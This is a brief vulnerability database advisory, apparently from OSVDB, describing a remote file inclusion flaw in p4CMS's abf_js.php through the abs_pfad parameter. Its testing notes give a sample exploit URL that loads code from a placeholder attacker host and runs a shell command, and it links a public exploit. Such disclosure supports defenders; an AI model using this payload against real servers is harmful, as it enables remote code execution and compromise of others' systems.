p4CMS abf_js.php abs_pfad Variable Remote File Inclusion

2006-09-12T11:04:04
ID OSVDB:28762
Type osvdb
Reporter OSVDB
Modified 2006-09-12T11:04:04

Description

Manual Testing Notes

http://[target/[path]/abf_js.php?abs_pfad=http://[attacker]?&cmd=id

References:

Secunia Advisory ID:21891 Generic Exploit URL: http://milw0rm.com/exploits/2350